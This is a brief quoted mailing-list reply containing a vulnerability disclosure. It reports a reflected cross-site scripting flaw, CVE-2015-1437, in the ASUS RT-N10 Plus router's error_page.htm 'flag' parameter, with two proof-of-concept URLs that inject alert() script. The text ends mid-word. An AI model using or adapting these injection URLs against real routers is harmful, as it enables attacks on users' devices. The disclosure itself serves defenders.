*** kingkaustubh@xxxxxx wrote: > ##################################### > Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router > Author: Kaustubh G. Padwad > Product: ASUS Router RT-N10 Plus > Firmware: 2.1.1.1.70 > Severity: HIGH > Auth: Not requierd > CVE ID: CVE-2015-1437 > # Description: > Vulnerable Parameter: flag= > # Vulnerability Class: > Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) [...] > Enter this URL > 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d > 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d https://sintonen.fi/advisories/asus-router-auth-bypass.txt Micha
